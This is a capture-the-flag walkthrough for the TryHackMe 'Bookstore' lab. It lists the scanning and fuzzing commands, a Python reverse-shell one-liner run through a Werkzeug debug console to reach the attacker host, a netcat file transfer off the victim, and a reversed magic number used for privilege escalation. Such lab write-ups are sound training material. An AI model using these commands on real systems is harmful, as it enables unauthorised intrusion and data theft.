Bookstore
Room Link: https://tryhackme.com/room/bookstoreoc
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/5000 - HTTP
Kali
gobuster dir -u http://$VICTIM:5000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

The debug console is locked by a PIN; we will have to come back to it.

Kali
wfuzz -c -f bookstore.txt -u "http://10.10.237.140:5000/api/v1/resources/books?FUZZ=.bash_history" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404
Initial Shell
We now have the PIN for the console: 123-321-135

Kali
nc -lvnp 1337
Console
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.43.15",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo;fg
Privilege Escalation

Netcat
Kali(receiving)
nc -l -p 1234 > try-harder
Victim(sending)
nc -w 3 $KALI 1234 < try-harder
Ghidra
Opening try-harder in Ghidra shows how the magic number is made.
Kali
ghidra

We can quickly use Python to compute the answer:
Kali
python
1573724660 ^ 0x5db3 ^ 0x1116

Victim
./try-harder
Answer: 1573743953
